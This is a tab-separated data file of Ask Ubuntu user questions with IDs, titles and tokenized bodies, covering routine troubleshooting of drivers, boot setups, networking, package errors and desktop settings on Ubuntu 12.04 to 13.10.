348036	vsftpd with 12.04 : can not delete file from ftp command line	installed ubuntu 12.04 with vsftpd : ... can not delete files from ftp command line ( tried from windows command prompt , error 550 delete operation failed ) but can create directory , remove empty directory , upload files ... .. surprisingly can delete thru ftp client software . these are the permissions showing with ls -rwxr-xr-r for that file .
348038	how to reset ifconfig counters ?	when i run ifconfig eth0 see following lines : eth0 link encap : ethernet hwaddr 08:00:27:42:81 : a7 inet addr:10.0.2.15 bcast:10.0.2.255 mask:255.255.255.0 inet6 addr : fe80 : :a00:27ff : fe42:81a7/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:66 errors:0 dropped:0 overruns:0 frame:0 tx packets:212 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:8001 ( 8.0 kb ) tx bytes:34004 ( 34.0 kb ) how can i reset these counters especially rx/tx packets ?
348039	spotty wireless on acer c7 with 13.04	my acer came with the atheros ar9462 and it 's giving me problems . the ath9k nohwcrypt solution seems like it helped a little bit -- but only delayed the inevitable dropping networks every few minutes , unable to connect , etc . i 've looked into compat-wireless but ca n't figure out how to get it installed and set up . $ uname -r 3.4.0 $ sudo apt-get install linux-headers-generic ... the following extra packages will be installed : linux-headers-3.8.0-30 linux-headers-3.8.0-30-generic is there something weird going on with my chrubuntu install ( ubuntu on chromebook ) that 's making my kernel weird ? any other suggestions ?
348041	how do i make canon imageclass d420 work in ubuntu ?	how can i install a driver for the printer canon imageclass d420 ? the default drivers shipped with ubuntu do not work with it . i tried to install canon 's drivers , but i got the message : there was an error during the cups operation client error format not supported . canon support told me that their drivers ca n't support linux .
348047	inbuilt bluetooth on my lenovo all in one pc	i have an all in one pc with bluetooth built in , but ater 5 or 10 minutes of using ubuntu 12.04 it just stopes responding and no icons regarding bluetooth are shown on the notifications bar , can someone help
348050	login screen password language	i have ubuntu 12.04 , and 2 languages on my keyboard . every time the screen goes black it requires my password , which is in english . but the language set is the one i have used last . how can i make it use english by default in the login screen ? i am also ok with no password , it is my home computer .
348053	python 3.3.2 with shared option is incomplete	on ubuntu 12.04 , i am trying to compile and install python3.3.2 . my compile commands : ./configure -- prefix=/usr/local -- enable-shared make make install then i run : /usr/local/bin/python3.3 -- version and get : python3 : error while loading shared libraries : libpython3.3m.so.1.0 : can not open shared object file : no such file or directory if i build without -- enable-shared , everything runs fine , but i need the shared option to compile mod_wsgi against it . i do find libpython3.3m.so.1.0 in the /usr/local/lib folder , so i wonder if it is just looking in the wrong place . do i need to do a symlink from somewhere ?
348057	properties window , basic tab pie chart	i am wondering about the pie chart in the properties basic tab . i can see blue is used space and white free space but what does the gray part mean . i have been searching with no luck . thanks in advanced !
348065	reconfiguration of xserver-xorg package fails on 12.04 lts with raring hwe installed	i am attempting to remove fglrx ( proprietary amd/ati drivers ) and install the radeon open source driver . i am following the steps here : radeondriver - community ubuntu documentation https : //help.ubuntu.com/community/radeondriver x/troubleshooting/videodriverdetection - ubuntu wiki https : //wiki.ubuntu.com/x/troubleshooting/videodriverdetection # problem : _need_to_purge_-fglrx in particular , i just executed these three steps : sudo apt-get remove -- purge xorg-driver-fglrx fglrx* sudo apt-get install -- reinstall xserver-xorg-lts-raring libgl1-mesa-glx-lts-raring libgbm1-lts-raring sudo dpkg-reconfigure xserver-xorg the output of the last command was : /usr/sbin/dpkg-reconfigure : xserver-xorg is broken or not fully installed what should i do next ? i 'm running kubuntu 12.04 with the lts-raring hardware enablement stack installed .
348066	ca n't delete from ubuntu_free_culture	some media showed up in my ubuntu_free_culture folder which i ca n't delete . presumably this has something to do with permissions . i lack root privileges . i 'm a complete linux newbie .
348072	how do i remove items from the places section of the files sidebar ?	i do n't use the music , documents , pictures , video , and trash folders often enough to warrant them an honorary place on the sidebar of ubuntu 's 13.04 default file manager `` files '' . i would like to remove them , but the `` remove '' item on the context menu is grayed out . since linux distros tend to be configurable i 'm guessing there is a way around this . the gear menu does n't seem to have any options to do this : the bookmarks menu looked helpful , but it still made no changes . ( this is after i removed all the bookmarks i was n't interested in . ) i have also tried the suggestion from this answer and commented out lines i do n't want from user-dirs.dirs , but still no luck : $ vim ~/.config/user-dirs.dirs < edits > $ xdg-user-dirs-gtk-update how do you remove these default items from the sidebar ?
348086	ca n't find scanner	hp photosmart c5250 works fine as printer . how do i get simple scan & /or scanlite to find the hp c5250 scanner ? both applications report `` sorry no devices found '' . all-in-one printer scanner is on lan usb port . system settings has no scanner icon .
348090	change default guest session launcher applications ?	is it possible to change the default applications that appear on the launcher for guest sessions ? for example : remove : amazon webapp , ubuntu one , system options add : stellarium ( ubuntu 12.04 and newer ) . thank you for your time and answers .
348091	freeglut download terminates with error	hey guys am a complete nubie to linux and am trying to install freeglut i have a 64bit system and i mounted linux on my windows using wubi for 64 bit when i go to download freeglut it says /usr/bin/ld : can not find -lopengl32 /usr/bin/ld : can not find -lgdi32 /usr/bin/ld : can not find -lwinmm collect2 : ld returned 1 exit status make [ 2 ] : *** [ libglut.la ] error 1 make [ 2 ] : leaving directory `/home/johndrake/downloads/freeglut-2.8.1/src' make [ 1 ] : *** [ all-recursive ] error 1 make [ 1 ] : leaving directory `/home/johndrake/downloads/freeglut-2.8.1' make : *** [ all ] error 2 johndrake @ ubuntu : ~/downloads/freeglut-2.8.1 $ ^cke install johndrake @ ubuntu : ~/downloads/freeglut-2.8.1 $ any suggestions ? ?
348094	keyboard 's buttons	i have ubuntu 12.04.2 lts and my keyboard is : genius slimstar i222 . i have problem about fn ( function key ) . to exlain my problem : when i press buttons fn and f1 at the same time , ubuntu opens home folder instead my web browser . is it possible to make my keyborad to do appropriate things ? thanks for all answers !
348095	graphics driver problem with onboard graphics card	translated using software . i have a little more complicated problem namely i use time 2 weeks of ubuntu there i my windows 8 system to cerium laps has , now , however , i would like to play also a few plays about ubuntu about steam etc . runs so far quite well now to my problem i have a geforce gt 635 m graka in the notebook and specially one more intel of hd in 4000 by i5 3210 m of notebook processor now , however , the games are played with the intel 's map and laggen , hence , now i do not know on account of the nvidia driver of the geforce is already installed . i would want a system what i zwichen nvidia geforce gt 635 m to the gamen and intel of onboard graphics for multimedia can switch over as well as it with windows 8 the case was . here the output of lscpi : 00:02.0 vga compatible controller [ 0300 ] : intel corporation 3rd gen core processor graphics controller [ 8086:0166 ] ( rev 09 ) subsystem : asustek computer inc. device [ 1043:1447 ] kernel driver in use : i915 -- 01:00.0 vga compatible controller [ 0300 ] : nvidia corporation gf108m [ geforce gt 635m ] [ 10de:0de3 ] ( rev a1 ) subsystem : asustek computer inc. device [ 1043:1447 ] kernel driver in use : nouveau
348096	change the keyboard shortcut for launching the dash in 13.04 ?	when i hit the meta key i get the unity launcher . i do n't like this and would like to change it . i tried the answers from here with no luck . mostly because the following settings directories referenced there do n't exist on 13.04 : /desktop/unity /apps/compiz-1/plugins/unityshell /com/canonical/unity-2d/ seems somebody is making it a hobby to move this setting around to a new place with each release ! can anybody figure out where the setting exists on 13.04 ?
348098	how can i give internet access to local network via dhcp/gateway server ?	i think i now find myself somewhere between cognitive overload and like a babe lost in the woods . thus i hope someone out there can assist me ! : ) i setup a ubuntu 12.04 server on my home local network . it 's a dhcp / gateway setup following what seems to be the general idea in a tutorial . the box has two network cards . internet connection is via pppoe over a bridged adsl router . eth0 is the server 's connection to the internet and eth1 is the interface to the lan . i seem to suffer from the very common issue of the server has internet access ( ping url and ip works ) , clients on the lan can ping both network interfaces of the server but they can not ping url or ip . they do not have internet access . thus my request , based on server details further down : how can i give internet access to local network via my server ? or alternatively what small semi-colon-error have i missed in my setup ? : p 1 . /etc/network/interfaces auto lo iface lo inet loopback auto eth0 iface eth0 inet static address 192.168.1.2 netmask 255.255.255.0 network 192.168.1.0 broadcast 192.168.1.255 gateway 192.168.1.1 # dns-* options are implemented by the resolvconf package , if installed dns-nameservers 8.8.8.8 192.168.1.1 dns-search crowdcontrol.com auto dsl-provider iface dsl-provider inet ppp pre-up /sbin/ifconfig eth0 up # line maintained by pppoeconf provider dsl-provider auto eth1 iface eth1 inet static address 172.22.22.1 network 172.22.22.0 netmask 255.255.255.0 2 . /etc/rc.local /sbin/iptables -a input -i lo -j accept /sbin/iptables -a output -o lo -j accept /sbin/iptables -a input -m conntrack -- ctstate established , related -j accept /sbin/iptables -a output -m conntrack -- ctstate new , established , related -j accept /sbin/iptables -t nat -a postrouting -o eth0 -j masquerade /sbin/iptables -a forward -i eth1 -j accept exit 0 3 . /etc/dhcp/dhcp.conf ddns-update-style none ; option domain-name `` crowdcontrol.com '' ; option domain-name-servers 8.8.8.8 , 192.168.1.1 ; default-lease-time 3600 ; max-lease-time 7200 ; authoritative ; log-facility local7 ; subnet 172.22.22.0 netmask 255.255.255.0 { range 172.22.22.21 172.22.22.250 ; option routers 172.22.22.1 ; option domain-name-servers 8.8.8.8 , 192.168.1.1 , 196.220.59.188 ; } 4. route -n kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.1.1 0.0.0.0 ug 100 0 0 eth0 172.22.22.0 0.0.0.0 255.255.255.0 u 0 0 0 eth1 192.168.1.0 0.0.0.0 255.255.255.0 u 0 0 0 eth0 5 . `` watch -n 1 -d iptables -nvl '' shows packet activity in the forward chain when i do try to ping something on the internet , from a local machine . 6 . pinging 8.8.8.8 from machine on local network results in : ping 8.8.8.8 ( 8.8.8.8 ) 56 ( 84 ) bytes of data . from 192.168.1.1 icmp_seq=3 destination net unreachable from 192.168.1.1 icmp_seq=4 destination net unreachable from 192.168.1.1 icmp_seq=5 destination net unreachable from 192.168.1.1 icmp_seq=7 destination net unreachable etc ... ps : i have come across many a similair q & a but i can not seem to get my settings to work , even if i try their solutions . some examples i have found : ubuntu as a router/gateway - unable to access wan dhcp working but clients do n't have internet dhcp server not routing to connect to internet for clients also looked on serverfault.com , stackoverflow.com , ubuntu forums etc
348103	samsung stuck at black screen without live usb	i just installed ubuntu 12.04 on my samsung nc110 with a live usb . it all went pretty well . however , after the installation , my computer could only start when the live usb is plugged on . whenever i want to start it up on its own , it gets stuck on a black screen with a cursor flashing at the top left corner . i tried to search for fix online , but nothing worked . any suggestions ? i just tried some of the solutions to similar questions . now it can not boot whether or not the live usb is on . help !
348113	can i use parted instead of sfdisk ?	i 'm trying to replace a 3tb gpt hdd in a raid1 . is it possible to use `` parted '' instead of sfdisk ( sfdisk -d /dev/sda | sfdisk /dev/sdb ) ?
348116	how to install virtualbox on kubuntu 12.04 with lts-raring hardware enablement stack ?	i 'm running kubuntu 12.04 with the lts-raring hardware enablement stack . when i first installed the lts-raring hardware enablement stack i had problems with virtualbox but i resolved those ( see `` background '' below ) . however , a recent update caused new and more severe problems . whenever i try to start a virtual machine at the moment the virtual machine boots into the gui , my entire system ( the host os ) crashes ( it instantly reboots without warning ) . in researching this i see the following bug report : bug # 1127101 “installing ltsenablementstack in ubuntu 12.04.2 breaks virtualbox” https : //bugs.launchpad.net/ubuntu/+source/virtualbox/+bug/1127101 temporary workaround : uninstall virtualbox and install virtualbox-4.2 from oracle repositories . see here for instructions : http : //www.ubuntuupdates.org/ppa/virtualbox.org_contrib ? dist=precise is that the best solution or the recommended approach ? is anyone else seeing this issue ? here 's some system info : $ uname -r 3.8.0-30-lowlatency $ dpkg -s virtualbox package : virtualbox status : install ok installed maintainer : ubuntu developers < ubuntu-devel-discuss @ lists.ubuntu.com > architecture : amd64 version : 4.1.12-dfsg-2ubuntu0.3 background : how i initially resolved the problem : comment # 13 : bug # 1076603 : bugs : “virtualbox-guest kernel module fails to build on 3.7.0 kernel” https : //bugs.launchpad.net/ubuntu/+source/virtualbox/+bug/1076603/comments/13 wget -o /tmp/virtualbox.patch 'http : //bugs.debian.org/cgi-bin/bugreport.cgi ? msg=99 ; filename=vbox-wheezy.patch ; att=1 ; bug=696011' cd /usr/src/virtualbox-4.1.12/ patch -p4 < /tmp/virtualbox.patch dkms autoinstall
348118	help with uninstalling fglrx drivers	i am trying to uninstall the default fglrx drivers and from the first step i found a difficulty while typing : sudo sh /usr/share/ati/fglrx-uninstall.sh i get the following : sh:0 cant open sh /usr/share/ati/fglrx-uninstall.sh what should i do ?
348119	how to make applications save dotfiles at a specified path ?	currently , all my config dotfiles and dotfolders ( e.g . .cache , .adobe , .compiz ) are in my $ home folder . is there a environment variable that i can specify which will make all applications save their respective dot files in that folder ? e.g . export config_folder= '' /home/rajiv/dotfiles '' if so , where do i specify this ?
348121	how to prevent users from shutting down or rebooting from unity and lightdm in ubuntu 13.10 ?	i 'm trying to remove shutdown/reboot/sleep ( just want to leave the possibility to log-out ) from the unity and lightdm menu on ubuntu 13.10 but to no avail . i 've already tried to apply polkit-1 recipes found on other questions and websites but it does n't seem to have any effect here ...
348126	evolution how to add a keyboard shortcut for search	i would like to access the search-bar ( mail-view ) like in hunderbid with ctrl + f. is there a way to set this shortcut or at least another one for this function ?
348130	ubuntu showing multiple batteries on macbookpro	i 'm running ubuntu 13.04 on macbook pro and got that problem . it show 2 battery icons , one charged and other with 25 % ( it does n't change ) . i think is n't a big deal , but one day i just suspend the pc and when i started i got the `` low battery '' message and then the macbook shutdown . i had to connect to battery again ( and it was with full battery after it turn on ) .
348131	ubuntu builder iso file ?	i got ubuntu builder , the iso and some packages . however , after build , i did not find my iso ... where is it stored ? was it stored to what folder ?
348132	networkmanager not calling dispatcher.d down	by looking at my syslog , i see that networkmanager executes the scripts in /etc/networkmanager/dispatcher.d/ on the `` up '' state on boot , as expected . but it does not trigger on the `` down '' state when shutting down . i tried just doing ifconfig eth0 down , and it worked , so it 's just when shutting down my system ( using the normal gui shutdown button ) that the dispatcher.d scripts are not called . question is : is this behavior intended ?
348134	user does not exist in /etc/passwd when trying to change the default shell	i want to change my default shell from tcsh to bash . so i tried and this is what happened : > sudo chsh userid changing the login shell for userid enter the new value , or press enter for the default login shell [ /xhbin/tcsh ] : /bin/bash chsh : user 'userid ' does not exist in /etc/passwd indeed , i am not in /etc/passwd . i do n't know why . what can i do ?
348135	.nfs0000 ... files keep showing up and disappearing when using mercurial	as of late , something seems to have happened on my machine that is more annoying than anything else : every time i look in a directory for mercurial changes it tells me about two .nfs # # # # files that then immediately vanish . # # # # seems to increment every time they flicker back . is my computer going nuts ? is this mercurial related ? file system related ( this is a network mounted drive ) ? $ hg st ? .nfs000000001b1d062600000a43 ? .nfs000000001b1d085a00000a44 $ ls -lhtra total 1.7m drwxrwxr-x 5 nick nick 4.0k sep 2 14:34 media/ drwxrwxr-x 6 nick nick 4.0k sep 19 17:07 venv/ drwxrwxr-x 7 nick nick 4.0k sep 19 18:55 lab_web/ drwxrwxr-x 8 nick nick 4.0k sep 19 20:15 templates/ drwxrwxr-x 5 nick nick 4.0k sep 20 17:44 .hg/ -rw-rw-r -- 1 nick nick 252 jul 23 17:21 manage.py -rw-rw-r -- 1 nick nick 177 sep 19 17:07 requirements.txt -rw-r -- r -- 1 nick nick 1.7m sep 19 19:46 lab_sqlite3.db -rw-rw-r -- 1 nick nick 141 sep 19 20:26 debug_requirements.txt -rw-rw-r -- 1 nick nick 274 sep 20 17:44 .hgignore $ hg st ? .nfs000000001b1d062600000a47 ? .nfs000000001b1d085a00000a48 $ hg st ? .nfs000000001b1d062600000a49 ? .nfs000000001b1d085a00000a4a
348136	prevent non-root users from viewing /var/www	is there a way to prevent users from viewing /var/www ? i tried chmod 0750 on /var/www , however , that prevented the webserver from viewing the files as well . thanks !
348139	tried installing nvidia driver , now ca n't do much of anything	i tried installing the nvidia graphics card driver for my ubuntu 13.04 64 bit computer finding the appropriate driver from http : //www.nvidia.com/download/find.aspx . now i 'm locked out of the machine and ca n't do anything . i 've also got my home directory encrypted if that matters and just before trying this install , i successfully installed an nvidia graphics driver on another distro which replaced my grub bootloader . what i did to install : ctrl - alt - f1 sudo stop lightdm sudo ./nvidia-linux-x86_64-319.49.run what i 've tried to do : booting into recovery mode , failsafe graphical mode error during boot , does n't complete startup start root shell and ... sudo apt-get install xserver-xorg-video-nouveau getting some kind of io error saying the directories are read only . sudo dpkg-reconfigure xserver-xorg nothing happens sudo dpkg-reconfigure nvidia-current nothing happens sudo start lightdm screen goes black . freezes i 'm really at a loss of what to do here , and it seems i 'm kind of screwed .
348141	errors when running apt-get update	so i 'm running the following command : $ sudo apt-get update when i do , i get the following errors : err http : //ppa.launchpad.net precise/main sources 404 not found err http : //ppa.launchpad.net precise/main i386 packages 404 not found ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en fetched 1,670 kb in 2s ( 805 kb/s ) w : failed to fetch http : //ppa.launchpad.net/amith/ubuntutools/ubuntu/dists/precise/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/amith/ubuntutools/ubuntu/dists/precise/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . in software sources , i attempted updates from the united states server as well as the main server but the error persists . i also do n't know what these sources provide . i am having difficulty compiling certain packages from source code . do these sources update any packages that affect this process ?
348143	to repair boot or not to repair boot	sorry , yet another n00b with dual boot issues . i installed ubuntu on an asus x401a . the installation never found the existing os ( windows 7 ) but after a learning curve , i made it through , by making my own partitions and following other advice in ubuntu 's main uefi documentation . now , when i boot up , i get grub , and from there i can select ubuntu or it will boot up automatically , or i can go to `` system setup '' ( the uefi equivalent of bios menu , i guess ) . but there is no windows 7 choice . i can press `` c '' , type `` exit '' and then it boots straight into windows . this is really fine . but i 'm here to learn , after all , and it seems to me i 'm not really finished unless windows 7 is one of my options in the grub menu . should i leave well enough alone or forge ahead with your sage guidance ? for your viewing pleasure , i made a boot-repair-disk thingie but i did n't actually ask the program to repair anything , having seen many forum posts from n00bs like myself do it wrong and make things worse . http : //paste.ubuntu.com/6126199/ thanks for reading !
348144	ca n't find numeric keypad when calling support	is it just me or there 's no numeric keypad feature for the ubuntu build of skype 4.2 ? i 'm trying to call a support which asks me to enter an extension . the solutions in the internet do n't work . any thoughts ?
348145	modify gtk3 theme - menu bar	i 've installed faiencezukimac gtk3 theme and there 's a `` white balloon '' surrounding each entry in the menu of every gtk3 program . here 's a screenshot of what i 'm talking about how can i change it in order to remove that `` white balloon '' and make it the same color as the general background ? i was messing with the color values of the gtk-main.css with no luck . also , i do n't know the `` real '' name of that area of the window . is it called menu bar ? thanks in advance .
348151	red items in html sudo lshw -html > ~/hardware.html	i am checking list of devices installed in my system i used the following sudo lshw -html > ~/hardware.html many items come in red in that list , other come in yellow color . does red means something wrong with them ? thanks
348153	the intel-microcode package causes random errors	i installed the latest intel-microcode package and i 'm getting random system error boxes coming up . i assume this is due to the wrong microcode being loaded at boot-up , but i checked the intel website and my cpu ( core 2 duo ) is supported .
348154	computer no longer asks which os to boot from	my computer came with windows vista , and i later dual-boot installed ubuntu . recently , i upgraded windows vista to windows 7 , and since then , the computer no longer asks which operating system i want to boot from . so this means i no longer know how to boot ubuntu at all . i 'd prefer not to have to reinstall ubuntu unless absolutely necessary . any idea what i can do to fix this ?
348156	migrating lvm installation to new drive - how to create boot partition ?	i have ubuntu 12.04 installed on a single 1tb hdd under lvm2 . the disk contains a separate boot partition with everything else under the lvm . i 'd like to move everything to a larger drive and remove the existing drive . if possible , i 'd like to use the lvm facilities to do this because from what i 've read it looks easy , ie : pvcreate , vgextend , pvmove , vgreduce but : how would i recreate the boot partition on the new drive ? if it makes sense to use the lvm facilities , is it necessary first to initiate the new disk and if so , how ? output from fdisk and lvs : $ sudo fdisk -l /dev/sda disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00030346 device boot start end blocks id system /dev/sda1 * 2048 976895 487424 83 linux /dev/sda2 978942 1953523711 976272385 5 extended /dev/sda5 978944 1953523711 976272384 8e linux lvm $ sudo lvs lv vg attr lsize origin snap % move log copy % convert lv-home vg-one -wi-ao 186.26g lv-root vg-one -wi-ao 37.25g lv-storage vg-one -wi-ao 565.66g lv-swap vg-one -wi-ao 1.86g thanks .
348159	intel graphics slows/lags after 2 minutes of game play	i have amd mobility 6000 series graphics card along with intel sandy bridge ( 2nd gen ) hd 3000 . amd graphics with catalyst driver is fine , but i can not get intel graphics card to get working with fairly decent performance . i have tried the xorg-video-intel drivers from mesa 9.1 to mesa 9.2 through different methods ( intel 's graphics installer , oibaf ppa , xorg-edgers in ubuntu 13.04 ) , elementary os , arch etc . in some cases the games start to lag little later , but the end result is pretty similar in all of them . laptops heats up and the graphics can not keep up the gaming performance and starts to lag . it looks like a sluggish java application , where the garbage collector is not working . in one occasion , it completely halted my arch installation ( i guess over heating ) . i tried different sandy bridge related parameters in the linux line through /etc/default/grub . i also tried the semaphore options , but without any success . i have also gone with pure open source options ( without installing catalyst drivers ) . in this case sna is enabled , but the end result is similar to the uxa which is set when i use catalyst driver . since i do n't have any options in bios to switch to a particular graphics card , i am unable to use radeon drivers , unless they properly implement dynamic switching while using graphics intensive applications . if i have to use open source drivers , i always turn off amd graphics card using vgaswitcheroo . i am hoping wayland or mir is going to solve this problem . intel graphics card was not like this always . i have played tf2 for hours on this graphics card . it did not lag this much before mesa 9.1 . these days i915_hangcheck_hung *error* hangcheck timer elapsed ... gpu hung is becoming a common thing . is there something , i can do to bring back the performance , or should i rely on intel 's buggy driver and hope they will fix it some day . once in old days , i had lost the support for 845g , after which i had to be selective about my linux installation . this time i do n't want to give up intel hd 3000 , just because intel developers do n't care about testing hd 3000 and go with 4000 and above instead . is there a tweak , settings in ubuntu that i can do to bring back the performance . if i want to downgrade to mesa version 9.0 , can i do it . if so , how ?
348160	how to save removable sound device configuration after reboot	everyone i have some rosewill 5.1 channel usb headphones . after a fresh reboot , when i plug them in , they come up as a stereo device ( if they were n't plugged in at boot ) i used to be able to just set them as 5.1 in the sound menu , so this was n't a problem . but in 13.04 , i have to open the terminal and go to pavucontrol to set the 5.1 channel audio profile . so , i was wondering if there was a way to save this configuration so that even if the device is n't plugged in at boot , when it is plugged in , the correct config will come up . something like changing the default config for the manufacture and device id ? is there a way to run a script when a certain usb device is plugged in ? thanks in advance for your help
348162	fails to dual-boot after ubuntu 13.04 installation , probably mistaken partitioning	i 've just installed ubuntu and i think that i did a mistake because my pc boots every time directly to windows 7 that was preinstalled . i had 2 partitions in a 1gb hard disk . 500gb ntfs for sharing with ubuntu and 300gb ntfs for windows . ( and 200gb unallocated ) that 's what i did : i download ubuntu 13.04 .iso burn it to a usb successfully with lili usb creator boot from usb and select install ubuntu create new logical partition of type swap 20gb create new primary partition of type ext4 180gb for / and then i select that as the device for boot loader installation . as i remember both partitions i created were at the end of the disk , but i am not sure . also every time i select try ubuntu from live usb it crashes or is deadly slow , so please dont suggest me to fix it from there . should i reinstall or is there another way to solve this ? bonus question : what is the difference between /dev/sdx and /dev/sdxy ?
348163	ubuntu 13.04. i want the screen on 24/7 .	i am building a process machine that must not turn off at all , and maintain the screen . how do i disable the black screen of inactivity ? i have not found a simple way in the gui . thank you
348168	ubuntu wo n't logout on first log out attempt	most of the time when i hit 'log out , ' ubuntu closes half of the applications i have running ... .and that 's it . i have to hit log out a second time to actually log out . has anyone else experienced this or does anyone know of a fix ?
348173	how to install 7zip through terminal to extract rar files	how do i install 7zip through terminal to extract rar files ?
348179	how to extend the size of my ubuntu partition	i have installed ubuntu 13.04 on my pre-installed windows8 sony laptop with hdd of 500gb . there are a few partitions present by default like recovery , etc . i have created a few other partitions of 200 gb and 100 gb on /dev/sda7 and /dev/sda8 respectively . my windows 8 is installed on /dev/sda5 while i have installed ubuntu on /dev/sda11 with swap on /dev/sda12 . now , i want to shrink my windows 8 drive which is 109 gb and extend the ubuntu partition of 15 gb by using the unallocated space from the earlier drive . i tried using gparted via liveusb and performing the swap-off but i was unsuccessful . please suggest me a way asap . thanks .
348180	installing ubuntu on dell inspiron with xp	primo noob here . i would like to install ubuntu on my laptop . i have downloaded universal usb installer and i am stuck where it asks me to choose ( or browse ) s linux distribution and then an ios . can someone be kind and help me please ? mike
348181	ca n't update software	i ca n't update because : w : failed to fetch http : //ppa.launchpad.net/bean123ch/burg/ubuntu/dists/quantal/main/source/sources 404 not found what can i do ?
348183	update manager error ubuntu 12.04 lts	red exclamation point in triangl up there is scareing me when i click on it this shows up : the update information is outdated.this may be caused by network problems or by a repository that is no longer available . please update manually by clicking this and then selecting 'check for updates ' and check if some of the listed repositories fail . so i do that and once its done checking this comes up : failed to download repository information check your internet connection . w : failed to fetch htp : //ppa.launchpad.net/pmcenery/ppa/ubuntu/dists/precise/main/source/sources 404 not found , w : failed to fetch htp : //ppa.launchpad.net/pmcenery/ppa/ubuntu/dists/precise/main/binary-amd64/packages 404 not found , w : failed to fetch htp : //ppa.launchpad.net/pmcenery/ppa/ubuntu/dists/precise/main/binary-i386/packages 404 not found , e : some index files failed to download . they have been ignored , or old ones used instead . i yook out one of the t 's in http because the 10rep thing
348185	ubuntu 13.04 server - there is an installation problem	the ubuntu 13.04 stuck almost every time when you try to reboot the server from inside the os , from time to time an error ( 0003 ) pop up on my screen . we need to make this image work in virtual environment as a pre-installed ( pre-installed means that the os has already been installed by us . you just need to attach it to your server and set it up . ) , but as i said the image does not work . all others images of linux are working fine . could be a problem with the capabilities of our platform and is the ubuntu 13.04 server support virtual environment ? please , help ?
348186	where does springseed store data ?	i want to backup my data and i use springseed to take my notes . where does it store the notes i write ? i checked /opt/springseed but i cant find the data there . i 'm sorry if this question has already been asked , but i cant find that question , mods , if you could direct me there , that would be great.thanks makrand
348187	ubuntu 12.04 not booting on windows 7	today i installed ubuntu 12.04 on my windows 7 laptop ( installed in d : drive ) using wubi installer ( i used the iso file , 64bit ) . now when i restart my laptop i have to 2 options to boot with : windows 7 and ubuntu . when i click on ubuntu , the following error message appears : windows failed to start . a recent hardware or software change might be the cause . to fix the problem : 1 . insert your windows installation disc and restart your computer . 2 . choose your language settings , and then click `` next . '' 3 . click `` repair your computer . '' if you do n't have this disc , contact your system administrator or computer manufacturer for assistance . file : \ubuntu\winboot\wubildr.mbr status : 0xc0000098 info : the selected entry could not be loaded because the application is missing or corrupt , when i checked , the file \ubuntu\winboot\wubildr.ubr was there in the installed directory . i do n't know why this error is appearing .
348189	missing gnome shell session circle badge	i have install gnome shell 3.4.1 on 12.04lts , yesterday i try to upgrade gnome-shell using ricotz testing and gnome-3 team ppa , and get gnome shell 3.5.x here . unfortunately , this upgrade change some settings and appearence . so that , i purge all of gnome shell 3.5.x and re-install gnome 3.4.1 again ( stable ) . but badge gnome session at login is missing . same with ubuntu badge . like this how to fix this missing ?
348191	ca n't install ruby-1.8.7-p334 via rvm	i 'm having difficult installing ruby on my computer . i initially wanted to install the ruby-2.0.0-p247 but rvm could not find the package . when running the following command : rvm install ruby-1.8.7-p334 i get the following response in the terminal : installing ruby from source to : /usr/share/ruby-rvm/rubies/ruby-1.8.7-p334 , this may take a while depending on your cpu ( s ) ... ruby-1.8.7-p334 - # fetching ruby-1.8.7-p334 - # extracted to /usr/share/ruby-rvm/src/ruby-1.8.7-p334 ( already extracted ) ruby-1.8.7-p334 - # configuring ruby-1.8.7-p334 - # compiling error : error running 'make ' , please read /usr/share/ruby-rvm/log/ruby-1.8.7-p334/make.log error : there has been an error while running make . halting the installation . okay , so i retrieved the make.log file . it 's about 387 lines of compilation errors , however . i 'll post it if it 's necessary . is there something wrong with my rvm installation ? i used the following command to install it : sudo apt-get install ruby-rvm
348193	reset password not accepted	i reset my password in ubuntu 12.04 . i got `` password reset successfully '' message.but when i try install/ unistall softwares , i get `` worng pawwsord '' message . why it is so ?
348196	how do i enable ubuntu to suspend the machine using lukssuspend during sleep/hibernate	this question is related to another one by @ stefan , but it is not a duplicate of it . the questions are slightly different : the author simply wanted to know if this had been implemented , while i 'm asking for help specifically on how to do this ( in a particular way ) . additionally , the other question got no useful answers for implementers , except a recent one that merely linked to my attempt at this . having explained the `` duplicate '' issue ... i 'm on ubuntu 14.04 using full disk encryption ( lvm on top of luks ) and i would like to incorporate lukssuspend into the suspend procedure ( and later use luksresume ) so that i can suspend to ram without leaving key material on memory and the root unlocked . i 've tried to port a script for arch linux , so far without success : i honestly have no idea of what i 'm doing ... can anyone help me port this ( or create something like this from scratch ) ? or , at least , can anyone point me to documentation about how to hook stuff into the suspend procedures and how to keep the necessary binaries and scripts ( such as cryptsetup ) available even after all io to root has been blocked ( by lukssuspend ) ? concerning how to keep the necessary binaries and scripts available for resume , this other blog post ( also for arch ) copied them to /boot ; i would like however to use something more in the lines what vianney used in the script i mentioned before , because that approach appears to be a bit more elegant in this aspect . i have n't reached much , but my development can be found on github .
348201	dependency problems while installing isc-dhcp-server	i 'm a newbie in the ubuntu world . as a result , i 'm having some problems with my ubuntu 12.04 lts . i have an android device which i want to connect to my ubuntu . to make this possible , i am trying to follow this tutorial : wireless - how to setup a wi-fi hotspot ( access point mode ) . so far , i have been able to follow this tutorial up to part 1 . when i started part 2 , i tried to install isc-dhcp-server from command line as well as software center . however , both of them show the same error . my command line output is this : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : isc-dhcp-server : depends : isc-dhcp-common ( = 4.1.esv-r4-0ubuntu5.6 ) but 4.1.esv-r4-0ubuntu5.8 is to be installed e : unable to correct problems , you have held broken packages . i have also tried to install isc-dhcp-common according to the error report . however , they seem to be already 